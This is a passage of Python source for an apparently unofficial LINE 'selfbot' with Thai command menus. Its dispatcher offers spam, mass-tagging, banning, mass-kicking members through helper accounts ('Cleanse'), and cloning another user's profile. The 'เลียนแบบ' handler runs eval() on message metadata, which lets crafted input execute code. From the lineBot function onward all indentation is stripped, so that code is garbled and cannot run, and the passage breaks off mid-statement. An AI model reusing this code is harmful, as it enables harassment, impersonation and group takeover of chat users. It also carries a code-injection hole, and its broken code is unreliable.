        messageReq[to] = -1
    messageReq[to] += 1
def sendMessageWithMention(to, lineMID):
    """Send the text "@x " to chat *to*, @-mentioning contact *lineMID*.

    The mention metadata covers character offsets 0-3 of the message
    (the "@x " placeholder). Failures are recorded via logError.
    """
    try:
        mentionee = '{"S":"0","E":"3","M":'+json.dumps(lineMID)+'}'
        metadata = {'MENTION': '{"MENTIONEES":[' + mentionee + ']}'}
        line.sendMessage(to, '@x ', contentMetadata=metadata, contentType=0)
    except Exception as failure:
        logError(failure)
def myhelp():
    """Return the (Thai) main command-list help text shown to users.

    The text is a single constant string assembled from one line per
    bot command; it is sent verbatim to chats, so every character here
    is user-visible runtime content.
    """
    myHelp = " 【คำสั่ง ➾ เรียกดูคำสั่ง】"+ " \n" + \
    " 【คำสั่งแปล ➾ เรียกดูคำสั่งแปล】"+ " \n" + \
    " 【รีบูส ➾ รูบูสระบบ】"+ " \n" + \
    " 【เช็คออน์ ➾ เช็คเวลาทำงานบอท】"+ " \n" + \
    " 【ไลน์ ➾ เช็คข้อมูลไลน์】"+ " \n" + \
    " 【เช็คตั้งค่า ➾ เช็คระบบตั้งค่า】"+ " \n" + \
    " 【ไอดี ➾ ดูmid】"+ " \n" + \
    " 【ชื่อ ➾ ดูชื่อไลน์】"+ " \n" + \
    " 【รูป ➾ ดึงรูป】"+ " \n" + \
    " 【รูปวิดีโอ ➾ ดึงวิดีโอ】"+ " \n" + \
    " 【รูปปก ➾ ดึงปก】"+ " \n" + \
    " 【คท @ ➾ ดึงคอนแทค】"+ " \n" + \
    " 【ชื่อ @ ➾ ดึงชื่อ】"+ " \n" + \
    " 【ตัส @ ➾ ดึงตัส】"+ " \n" + \
    " 【รูป @ ➾ ดึงรูป】"+ " \n" + \
    " 【รูปวิดีโอ @ ➾ ดึงรูปวิดีโอ】"+ " \n" + \
    " 【ปก @ ➾ ดึงปก】"+ " \n" + \
    " 【คืนร่าง ➾ กลับร่างเดิม】"+ " \n" + \
    " 【เลียนแบบ @ ➾ เพิ่มพูดตาม】"+ " \n" + \
    " 【เลียนแบบลบ @ ➾ ลบพูดตาม】"+ " \n" + \
    " 【เช็คเลียนแบบ ➾ เช็คชื่อพูดตาม】"+ " \n" + \
    " 【เช็คแอด ➾ เช็คแอดห้อง】"+ " \n" + \
    " 【ไอดีกลุ่ม ➾ GID กลุ่ม】"+ " \n" + \
    " 【รูปกลุ่ม ➾ ดึงรูปห้อง"+ " \n" + \
    " 【ชื่อกลุ่ม ➾ ดึงชื่อห้อง】"+ " \n" + \
    " 【ขอลิ้งค์ ➾ เอาลิ้งค์ห้อง】"+ " \n" + \
    " 【เปิดลิ้งค์ ➾ เปิดลิ้งค์ห้อง】"+ " \n" + \
    " 【ปิดลิ้งค์ ➾ ปิดลิ้งค์ห้อง】"+ " \n" + \
    " 【ข้อมูลกลุ่ม ➾ เช็ครายละเอียดห้อง】"+ " \n" + \
    " 【สมาชิก ➾ ชื่อสมาชิก】"+ " \n" + \
    " 【กลุ่ม ➾ เช็ครายชื่อกลุ่ม】"+ " \n" + \
    " 【1กลุ่ม ➾ คลิ้ก1 เช็ครายชื่อกลุ่ม】"+ " \n" + \
    " 【2กลุ่ม ➾ คลิ้ก2 เช็ครายชื่อกลุ่ม】"+ " \n" + \
    " 【3กลุ่ม ➾ คลิ้ก3 เช็ครายชื่อกลุ่ม】"+ " \n" + \
    " 【แท็ก ➾ สั่งแท็คคนทั้งหมด】"+ " \n" + \
    " 【เช็คอ่าน ➾ เปิดระบบอ่าน】"+ " \n" + \
    " 【อ่าน ➾ ดูรายชื่อคนอ่าน】"+ " \n" + \
    " 【ค้นหารูป ➾ ค้นหารูปจากgoogle】"+ " \n" + \
    " 【ค้นหาอินสตาแกรม ➾ หาอินสตาแกรม】"+ " \n" + \
    " 【รูปการตูน ➾ ค้นหารูปจากgoogle】"+ " \n" + \
    " 【ค้นหายูทูป ➾ ค้นหายูทูป】"+ " \n" + \
    " 【รายการเพื่อน ➾ เช็ครายชื่อเพื่อนเรา】"+ " \n" + \
    " 【รายการบล็อค ➾ รายการกดบล็อค】"+ " \n" + \
    " 【รายการmid ➾ รายการmidเพื่อนทั้งหมด】"+ " \n" + \
    " 【เชิญกุ ➾ เชิญคนเขียนบอท】"+ " \n" + \
    " 【ออก ➾ สั่งตัวเองออกจากห้อง】"+ " \n" + \
    " 【ออก1 ➾ สั่งคลิ้กออก】"+ " \n" + \
    " 【ลบรัน ➾ ลบห้องรัน】"+ " \n" + \
    " 【เชิญ ➾ เชิญด้วยคท】"+ " \n" + \
    " 【เตะ @ ➾ ลบคน】"+ " \n" + \
    " 【เชิญ @ ➾ เชิญคน】"+ " \n" + \
    " 【1เชิญ @ ➾ สั่งคลิ้กเชิญ】"+ " \n" + \
    " 【2เชิญ @ ➾ สั่งคลิ้กเชิญ】"+ " \n" + \
    " 【3เชิญ @ ➾ สั่งคลิ้กเชิญ】"+ " \n" + \
    " 【เตะดำ ➾ เตะรายการบชดำ】"+ " \n" + \
    " 【ลบแชท ➾ สั่งลบแชททั้งหมด】"+ " \n" + \
    " 【ออกแชทรวม ➾ ออกจากแชทรวมออโต้】"+ " \n" + \
    " 【อัพตัส: ➾ เปลี่ยนตัสเรา】"+ " \n" + \
    " 【อัพชื่อ: ➾ เปลี่ยนชื่อเรา】"+ " \n" + \
    " 【ชื่อคลิ้ก ➾ เปลี่ยนชื่อคลิ้ก】"+ " \n" + \
    " 【ตัสคลิ้ก ➾ เปลี่ยนตัส】"+ " \n" + \
    " 【1ลบรัน ➾ ลบรัน】"+ " \n" + \
    " 【เช็คดำ ➾ เช็ครายการดำ】"+ " \n" + \
    " 【บล็อคเปิด ➾ ออโต้บล้อคเปิด】"+ " \n" + \
    " 【บล็อคปิด ➾ ออโต้บล็อคปิด】"+ " \n" + \
    " 【เข้าเปิด ➾ เข้าห้องออโต้เปิด】"+ " \n" + \
    " 【เข้าปิด ➾ เข้าห้องออโต้ปิด】"+ " \n" + \
    " 【แชทรวมเปิด ➾ กันดึงแชทรวมเปิด】"+ " \n" + \
    " 【แชทรวมปิด ➾ กันดึงแชทรวมปิด】"+ " \n" + \
    " 【อ่านเปิด ➾ เปิดระบบอ่าน】"+ " \n" + \
    " 【อ่านปิด ➾ ปิดระบบอ่าน】"+ " \n" + \
    " 【เช็คติ้กเปิด ➾ ระบบเช็คติ้กเปิด】"+ " \n" + \
    " 【เช็คติ้กปิด ➾ ระบบเช็คติ้กปิด】"+ " \n" + \
    " 【เปิดหมด ➾ เปิดระบบกันหมด】"+ " \n" + \
    " 【ปิดหมด ➾ ปิดระบบกันหมด】"+ " \n" + \
    " 【เปิดคนเข้า ➾ เปิดระบบต้อนรับ】"+ " \n" + \
    " 【ปิดคนเข้า ➾ ปิดระบบต้อนรับ】"+ " \n" + \
    " 【เปิดคนออก ➾ เปิดระบบต้อนรับ】"+ " \n" + \
    " 【ปิดคนออก ➾ ปิดระบบต้อนรับ】"+ " \n" + \
    " 【ทักออก: ➾ ตั้งข้อความทักคนเข้า】"+ " \n" + \
    " 【ทักเข้า: ➾ ตั้งข้อความทักคนออก】"+ " \n" + \
    " 【ตั้งแท็ก: ➾ ตั้งข้อความทักคนแท็ก】"+ " \n" + \
    " 【ลบเชิญs ➾ ลบค้างเชิญ】"+ " \n" + \
    " 【เช็ค ➾ตรวจจับคนอ่าน 】"+ " \n" + \
    " 【อ่าน ➾รายชื่อคนอ่าน】"+ " \n" + \
    " 【urban ➾ขาว 】"+ " \n" + \
    " 【Gcancel: on ➾ เปิดระบบยกเลิกห้อง】"+ " \n" + \
    " 【Gcancel: off ➾ ปิดระบบยกเลิกห้อง】"+ " \n" + \
    " 【Copy @ ➾ คัดลอกคนอื่น】"+ " \n" + \
    " 【me ➾ คทเรา】"+ " \n" + \
    " 【ME ➾ คทเรา】"+ " \n" + \
    " 【Me ➾ คทเรา】"+ " \n" + \
    " 【zt ➾ ดูคนไส่ล่องหน】"+ " \n" + \
    " 【zm ➾ ดูคนไส่ล่องหน】"+ " \n" + \
    " 【zc ➾ ดูคนไส่ล่องหน】"+ " \n" + \
    " 【Allban ➾ แบนหมด】"+ " \n" + \
    " 【ban @ ➾ บชดำ】"+ " \n" + \
    " 【unban @ ➾ บชขาว】"+ " \n" + \
    " 【video @ ➾ ดึงรูปวิดีโอ】"+ " \n" + \
    " 【mimic on ➾ เปิดระบบพูดตาม】"+ " \n" + \
    " 【mimic off ➾ ปิดระบบพูดตาม】"+ " \n" + \
    " 【Bcvoice +ข้อความ ➾ ดึงmid】"+ " \n" + \
    " 【Cbcvoice ➾ ส่งmp3ทุกห้อง】"+ " \n" + \
    " 【Dow +ข้อความ ➾ เปลี่ยนไอดีไลน์】"+ " \n" + \
    " 【Day ➾ เช็ควันและเดือน】"+ " \n" + \
    " 【Spam on +เลข+ข้อความ】 ➾ "+ " \n" + \
    " 【cb ➾ ล้างบชดำ】"+ " \n" + \
    " 【Sai ➾ สั่งคลิ้กเข้า】"+ " \n" + \
    " 【1-3 @ ➾ สั่งคลิ้กเตะ】"+ " \n" + \
    " 【Cleanse ➾ สั่งคลิ้กบิน】"+ " \n" + \
    " 【protect on ➾ เปิดป้องกัน】"+ " \n" + \
    " 【protect off ➾ ปิดป้องกัน】"+ " \n" + \
    " 【cancel on ➾ เปิดยกเลิกป้องกัน】"+ " \n" + \
    " 【cancel off ➾ ปิดยกเลิกป้องกัน】"+ " \n" + \
    " 【invit on ➾ เปิดเชิญป้องกัน】"+ " \n" + \
    " 【invit off ➾ ปิดเชิญป้องกัน】"+ " \n" + \
    " 【link on ➾ เปิดป้องกันลิ้งค์】"+ " \n" + \
    " 【link off ➾ ปิดป้องกันลิ้งค์】"+ " \n" + \
    " 【guest on ➾ เปิดป้องกันสมาชิก】"+ " \n" + \
    " 【guest off ➾ ปิดป้องกันสมาชิก】"+ " \n" + \
    " 【join on ➾ เปิดป้องกันคนเข้า】"+ " \n" + \
    " 【join off ➾ ปิดป้องกันคนเข้า】"+ " \n" + \
    "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
    return myHelp
def helptexttospeech():
    """Return the help text listing language codes accepted by the
    text-to-speech command.

    The text is a constant, user-visible string; each line maps a
    language code to its English name.
    """
    helpTextToSpeech = "╔══════════════┓" + "\n" + \
    "╠ af : Afrikaans" + "\n" + \
    "╠ sq : Albanian" + "\n" + \
    "╠ ar : Arabic" + "\n" + \
    "╠ hy : Armenian" + "\n" + \
    "╠ bn : Bengali" + "\n" + \
    "╠ ca : Catalan" + "\n" + \
    "╠ zh : Chinese" + "\n" + \
    "╠ zh-cn : Chinese (Mandarin/China)" + "\n" + \
    "╠ zh-tw : Chinese (Mandarin/Taiwan)" + "\n" + \
    "╠ zh-yue : Chinese (Cantonese)" + "\n" + \
    "╠ hr : Croatian" + "\n" + \
    "╠ cs : Czech" + "\n" + \
    "╠ da : Danish" + "\n" + \
    "╠ nl : Dutch" + "\n" + \
    "╠ en : English" + "\n" + \
    "╠ en-au : English (Australia)" + "\n" + \
    "╠ en-uk : English (United Kingdom)" + "\n" + \
    "╠ en-us : English (United States)" + "\n" + \
    "╠ eo : Esperanto" + "\n" + \
    "╠ fi : Finnish" + "\n" + \
    "╠ fr : French" + "\n" + \
    "╠ de : German" + "\n" + \
    "╠ el : Greek" + "\n" + \
    "╠ hi : Hindi" + "\n" + \
    "╠ hu : Hungarian" + "\n" + \
    "╠ is : Icelandic" + "\n" + \
    "╠ id : Indonesian" + "\n" + \
    "╠ it : Italian" + "\n" + \
    "╠ ja : Japanese" + "\n" + \
    "╠ km : Khmer (Cambodian)" + "\n" + \
    "╠ ko : Korean" + "\n" + \
    "╠ la : Latin" + "\n" + \
    "╠ lv : Latvian" + "\n" + \
    "╠ mk : Macedonian" + "\n" + \
    "╠ no : Norwegian" + "\n" + \
    "╠ pl : Polish" + "\n" + \
    "╠ pt : Portuguese" + "\n" + \
    "╠ ro : Romanian" + "\n" + \
    "╠ ru : Russian" + "\n" + \
    "╠ sr : Serbian" + "\n" + \
    "╠ si : Sinhala" + "\n" + \
    "╠ sk : Slovak" + "\n" + \
    "╠ es : Spanish" + "\n" + \
    "╠ es-es : Spanish (Spain)" + "\n" + \
    "╠ es-us : Spanish (United States)" + "\n" + \
    "╠ sw : Swahili" + "\n" + \
    "╠ sv : Swedish" + "\n" + \
    "╠ ta : Tamil" + "\n" + \
    "╠ th : Thai" + "\n" + \
    "╠ tr : Turkish" + "\n" + \
    "╠ uk : Ukrainian" + "\n" + \
    "╠ vi : Vietnamese" + "\n" + \
    "╠ cy : Welsh" + "\n" + \
    "╚══════════════┛" + "\n" + "\n\n" + \
    ""
    return helpTextToSpeech
def helplanguange():
    """Return the help text listing language codes accepted by the
    translate (tr-XX) commands.

    The text is a constant, user-visible string; each line maps a
    language code to its English name.
    """
    helpLanguange = "╔══════════════┓" + "\n" + \
    "╠ af : afrikaans" + "\n" + \
    "╠ sq : albanian" + "\n" + \
    "╠ am : amharic" + "\n" + \
    "╠ ar : arabic" + "\n" + \
    "╠ hy : armenian" + "\n" + \
    "╠ az : azerbaijani" + "\n" + \
    "╠ eu : basque" + "\n" + \
    "╠ be : belarusian" + "\n" + \
    "╠ bn : bengali" + "\n" + \
    "╠ bs : bosnian" + "\n" + \
    "╠ bg : bulgarian" + "\n" + \
    "╠ ca : catalan" + "\n" + \
    "╠ ceb : cebuano" + "\n" + \
    "╠ ny : chichewa" + "\n" + \
    "╠ zh-cn : chinese (simplified)" + "\n" + \
    "╠ zh-tw : chinese (traditional)" + "\n" + \
    "╠ co : corsican" + "\n" + \
    "╠ hr : croatian" + "\n" + \
    "╠ cs : czech" + "\n" + \
    "╠ da : danish" + "\n" + \
    "╠ nl : dutch" + "\n" + \
    "╠ en : english" + "\n" + \
    "╠ eo : esperanto" + "\n" + \
    "╠ et : estonian" + "\n" + \
    "╠ tl : filipino" + "\n" + \
    "╠ fi : finnish" + "\n" + \
    "╠ fr : french" + "\n" + \
    "╠ fy : frisian" + "\n" + \
    "╠ gl : galician" + "\n" + \
    "╠ ka : georgian" + "\n" + \
    "╠ de : german" + "\n" + \
    "╠ el : greek" + "\n" + \
    "╠ gu : gujarati" + "\n" + \
    "╠ ht : haitian creole" + "\n" + \
    "╠ ha : hausa" + "\n" + \
    "╠ haw : hawaiian" + "\n" + \
    "╠ iw : hebrew" + "\n" + \
    "╠ hi : hindi" + "\n" + \
    "╠ hmn : hmong" + "\n" + \
    "╠ hu : hungarian" + "\n" + \
    "╠ is : icelandic" + "\n" + \
    "╠ ig : igbo" + "\n" + \
    "╠ id : indonesian" + "\n" + \
    "╠ ga : irish" + "\n" + \
    "╠ it : italian" + "\n" + \
    "╠ ja : japanese" + "\n" + \
    "╠ jw : javanese" + "\n" + \
    "╠ kn : kannada" + "\n" + \
    "╠ kk : kazakh" + "\n" + \
    "╠ km : khmer" + "\n" + \
    "╠ ko : korean" + "\n" + \
    "╠ ku : kurdish (kurmanji)" + "\n" + \
    "╠ ky : kyrgyz" + "\n" + \
    "╠ lo : lao" + "\n" + \
    "╠ la : latin" + "\n" + \
    "╠ lv : latvian" + "\n" + \
    "╠ lt : lithuanian" + "\n" + \
    "╠ lb : luxembourgish" + "\n" + \
    "╠ mk : macedonian" + "\n" + \
    "╠ mg : malagasy" + "\n" + \
    "╠ ms : malay" + "\n" + \
    "╠ ml : malayalam" + "\n" + \
    "╠ mt : maltese" + "\n" + \
    "╠ mi : maori" + "\n" + \
    "╠ mr : marathi" + "\n" + \
    "╠ mn : mongolian" + "\n" + \
    "╠ my : myanmar (burmese)" + "\n" + \
    "╠ ne : nepali" + "\n" + \
    "╠ no : norwegian" + "\n" + \
    "╠ ps : pashto" + "\n" + \
    "╠ fa : persian" + "\n" + \
    "╠ pl : polish" + "\n" + \
    "╠ pt : portuguese" + "\n" + \
    "╠ pa : punjabi" + "\n" + \
    "╠ ro : romanian" + "\n" + \
    "╠ ru : russian" + "\n" + \
    "╠ sm : samoan" + "\n" + \
    "╠ gd : scots gaelic" + "\n" + \
    "╠ sr : serbian" + "\n" + \
    "╠ st : sesotho" + "\n" + \
    "╠ sn : shona" + "\n" + \
    "╠ sd : sindhi" + "\n" + \
    "╠ si : sinhala" + "\n" + \
    "╠ sk : slovak" + "\n" + \
    "╠ sl : slovenian" + "\n" + \
    "╠ so : somali" + "\n" + \
    "╠ es : spanish" + "\n" + \
    "╠ su : sundanese" + "\n" + \
    "╠ sw : swahili" + "\n" + \
    "╠ sv : swedish" + "\n" + \
    "╠ tg : tajik" + "\n" + \
    "╠ ta : tamil" + "\n" + \
    "╠ te : telugu" + "\n" + \
    "╠ th : thai" + "\n" + \
    "╠ tr : turkish" + "\n" + \
    "╠ uk : ukrainian" + "\n" + \
    "╠ ur : urdu" + "\n" + \
    "╠ uz : uzbek" + "\n" + \
    "╠ vi : vietnamese" + "\n" + \
    "╠ cy : welsh" + "\n" + \
    "╠ xh : xhosa" + "\n" + \
    "╠ yi : yiddish" + "\n" + \
    "╠ yo : yoruba" + "\n" + \
    "╠ zu : zulu" + "\n" + \
    "╠ fil : Filipino" + "\n" + \
    "╠ he : Hebrew" + "\n" + \
    "╚══════════════┛" + "\n" + "\n\n" + \
    "BY SAI"
    return helpLanguange
#==============================================================================#
def lineBot(op):
try:
if op.type == 0:
return
if op.type == 5:
if settings["autoAdd"] == True:
line.blockContact(op.param1)
if op.type == 13:
if lineMID in op.param3:
G = line.getGroup(op.param1)
if settings["autoJoin"] == True:
if settings["autoCancel"]["on"] == True:
if len(G.members) <= settings["autoCancel"]["members"]:
line.rejectGroupInvitation(op.param1)
else:
line.acceptGroupInvitation(op.param1)
else:
line.acceptGroupInvitation(op.param1)
elif settings["autoCancel"]["on"] == True:
if len(G.members) <= settings["autoCancel"]["members"]:
line.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in settings["blacklist"]:
matched_list+=[str for str in InviterX if str == tag]
if matched_list == []:
pass
else:
line.cancelGroupInvitation(op.param1, matched_list)
if op.type == 25:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if text is None:
return
#==============================================================================#
if text.lower() == 'คำสั่ง':
myHelp = myhelp()
line.sendMessage(to, str(myHelp))
elif text.lower() == 'คำสั่ง2':
helpTextToSpeech = helptexttospeech()
line.sendMessage(to, str(helpTextToSpeech))
elif text.lower() == 'คำสั่ง3':
helpLanguange = helplanguange()
line.sendMessage(to, str(helpLanguange))
#==============================================================================#
elif text.lower() == 'Sp':
start = time.time()
line.sendMessage(to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elapsed_time = time.time() - start
line.sendMessage(to,format(str(elapsed_time)))
elif text.lower() == 'sp':
start = time.time()
line.sendMessage(to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elapsed_time = time.time() - start
line.sendMessage(to,format(str(elapsed_time)))
elif text.lower() == 'รีบูส':
line.sendMessage(to, "กรุณาล็อคอินลิ้งค์ใหม่.")
# line.sendMessage(to, "Success Restarting.")
restartBot()
elif text.lower() == 'เช็คออน์':
timeNow = time.time()
runtime = timeNow - botStart
runtime = format_timespan(runtime)
line.sendMessage(to, "เวลาการทำงานของบอท {}".format(str(runtime)))
elif text.lower() == 'ไลน์':
try:
arr = []
owner = "ubd78f3da598d3c32e075e062e88545ec"
creator = line.getContact(owner)
contact = line.getContact(lineMID)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
ret_ += "\nชื่อ ไลน์คุณ ✈️ {}".format(contact.displayName)
ret_ += "\nรายการกลุ่ม ✈️ {}".format(str(len(grouplist)))
ret_ += "\nรายการเพื่อน ✈️ {}".format(str(len(contactlist)))
ret_ += "\nรายการบล็อค ✈️ {}".format(str(len(blockedlist)))
ret_ += "\nตัส ✈️ "
ret_ += "\nผู้เขียนบอท ✈️{}".format(creator.displayName)
line.sendContact(to, owner)
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
#==============================================================================#
elif text.lower() == 'เช็คตั้งค่า':
try:
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
if settings["autoJoin"] == True: ret_ += "\nเข้าห้องออโต้ ↹ เปิด "
else: ret_ += "\nเข้าห้องออโต้ ↹ ปิด"
if settings["detectMention"] == True: ret_ += "\nข้อความแท็ก ↹ เปิด"
else: ret_ += "\nข้อความแท็ก ↹ ปิด"
if settings["autoLeave"] == True: ret_ += "\ออกแชทรวมออโต้ ↹ เปิด"
else: ret_ += "\nออกแชทรวมออโต้ ↹ ปิด"
if RfuProtect["Protectjoin"] == True: ret_ += "\nป้องกันการเข้ารวม ↹ เปิด"
else: ret_ += "\nป้องกันการเข้ารวม ↹ ปิด"
if settings["autoRead"] == True: ret_ += "\nระบบอ่าน ↹ เปิด"
else: ret_ += "\nระบบอ่าน ↹ ปิด"
if settings["checkSticker"] == True: ret_ += "\nเช็คสติ้กเกอร์ ↹ เปิด"
else: ret_ += "\nเช็คสติ้กเกอร์ ↹ ปิด"
if RfuProtect["Protectguest"] == True: ret_ += "\nป้องกัน ↹ เปิด"
else: ret_ += "\nป้องกัน ↹ ปิด"
if RfuProtect["inviteprotect"] == True: ret_ += "\nป้องกันการเชิญ ↹ เปิด"
else: ret_ += "\nป้องกันการเชิญ ↹ ปิด"
if RfuProtect["cancelprotect"] == True: ret_ += "\nป้องกันการยกเลิก ↹ เปิด"
else: ret_ += "\nป้องกันการยกเลิก ↹ ปิด"
if RfuProtect["protect"] == True: ret_ += "\nป้องกันการลบ ↹ เปิด"
else: ret_ += "\nป้องกันการลบ ↹ เปิด"
if RfuProtect["linkprotect"] == True: ret_ += "\nป้องกัน QR ↹ เปิด"
else: ret_ += "\nป้องกัน QR ปิด"
if settings["autoCancel"]["on"] == True:ret_+="\nยกเลิกเชิญกลุ่มเมื่อมีสมาชิกต่ำกว่า " + str(settings["autoCancel"]["members"]) + "↹ เปิด"
else: ret_ += "\nยกเลิกเชิญกลุ่ม ↹ ปิด"
if settings["autoAdd"] == True: ret_ += "\nออโต้บล็อค ↹ เปิด"
else: ret_ += "\nออโต้บล็อค ↹ ปิด"
ret_ += "\n"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
elif text.lower() == 'บล็อคเปิด':
settings["autoAdd"] = True
line.sendMessage(to, "ออโต้บล็อค ★ เปิด")
elif text.lower() == 'บล็อคปิด':
settings["autoAdd"] = False
line.sendMessage(to, "ออโต้บล็อค ★ ปิด")
elif text.lower() == 'เข้าเปิด':
settings["autoJoin"] = True
line.sendMessage(to, "เข้ารวมกลุ่่มออโต้ ★ เปิด")
elif text.lower() == 'เข้าปิด':
settings["autoJoin"] = False
line.sendMessage(to, "เข้ารวมกลุ่มออโต้ ★ ปิด")
elif text.lower() == 'แชทรวมเปิด':
settings["autoLeave"] = True
line.sendMessage(to, "ออกจากแชทรวม ออโต้ ★ เปิด")
elif text.lower() == 'แชทรวมปิด':
settings["autoLeave"] = False
line.sendMessage(to, "ออกจากแชทรวม ออโต้ ★ ปิด")
elif text.lower() == 'อ่านเปิด':
settings["autoRead"] = True
line.sendMessage(to, "ระบบอ่านและตรวจจับออโต้ ★ เปิด")
elif text.lower() == 'อ่านปิด':
settings["autoRead"] = False
line.sendMessage(to, "ระบบอ่านและตรวจจับออโต้ ★ ปิด")
elif text.lower() == 'เช็คติ้กเปิด':
settings["checkSticker"] = True
line.sendMessage(to, "เปิดการเช็คระบบ ตรวจสอบ สติ้กเกอร์ ★ เปิด")
elif text.lower() == 'เช็คติ้กปิด':
settings["checkSticker"] = False
line.sendMessage(to, "ปิดการเช็คระบบ ตรวจสอบ สติ้กเกอร์ ★ ปิด")
#==============================================================================#
elif text.lower() == 'me':
sendMessageWithMention(to, lineMID)
line.sendContact(to, lineMID)
elif text.lower() == 'ไอดี':
line.sendMessage(msg.to,"Mid ✪ " + lineMID)
elif text.lower() == 'ชื่อ':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"ชื่อ ✪ n" + me.displayName)
elif text.lower() == 'ตัส':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"ข้อความ&ตัส ✪ \n" + me.statusMessage)
elif text.lower() == 'รูป':
me = line.getContact(lineMID)
line.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() == 'รูปวิดีโอ':
me = line.getContact(lineMID)
line.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus + "/vp")
elif text.lower() == 'รูปปก':
me = line.getContact(lineMID)
cover = line.getProfileCoverURL(lineMID)
line.sendImageWithURL(msg.to, cover)
elif msg.text.lower().startswith("คท "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
mi_d = contact.mid
line.sendContact(msg.to, mi_d)
elif msg.text.lower().startswith("ไอดี "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
ret_ = "[ Mid User ]"
for ls in lists:
ret_ += "\n{}" + ls
line.sendMessage(msg.to, str(ret_))
elif msg.text.lower().startswith("ชื่อ "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "⊄ \n" + contact.displayName)
elif msg.text.lower().startswith("ตัส "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "⊄ \n{}" + contact.statusMessage)
elif msg.text.lower().startswith("รูป "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("video "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus + "/vp"
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("ปก "):
if line != None:
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = line.getProfileCoverURL(ls)
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("copy "):
if 'MENTION' in list(msg.contentMetadata.keys())!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
contact = mention["M"]
break
try:
line.cloneContactProfile(contact)
line.sendMessage(msg.to, "ลงคำสั่งคัดลอกใหม่")
except:
line.sendMessage(msg.to, "คัดลอก ∾ เรียบร้อย")
elif text.lower() == 'คืนร่าง':
try:
lineProfile.displayName = str(myProfile["displayName"])
lineProfile.statusMessage = str(myProfile["statusMessage"])
lineProfile.pictureStatus = str(myProfile["pictureStatus"])
line.updateProfileAttribute(8, lineProfile.pictureStatus)
line.updateProfile(lineProfile)
line.sendMessage(msg.to, "≟")
except:
line.sendMessage(msg.to, "≟")
#==============================================================================#
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
settings["autoCancel"]["on"] = False
if settings["lang"] == "JP":
line.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
line.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
settings["autoCancel"]["on"] = True
if settings["lang"] == "JP":
line.sendText(msg.to,strnum + " สมาชิกในกลุ่มจะปฏิเสธคำเชิญโดยอัตโนมัติ")
else:
line.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if settings["lang"] == "JP":
line.sendText(msg.to,"ค่าไม่ถูกต้อง")
else:
line.sendText(msg.to,"การจัดอันดับที่แปลกประหลาด")
elif msg.text.lower().startswith("เลียนแบบ "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
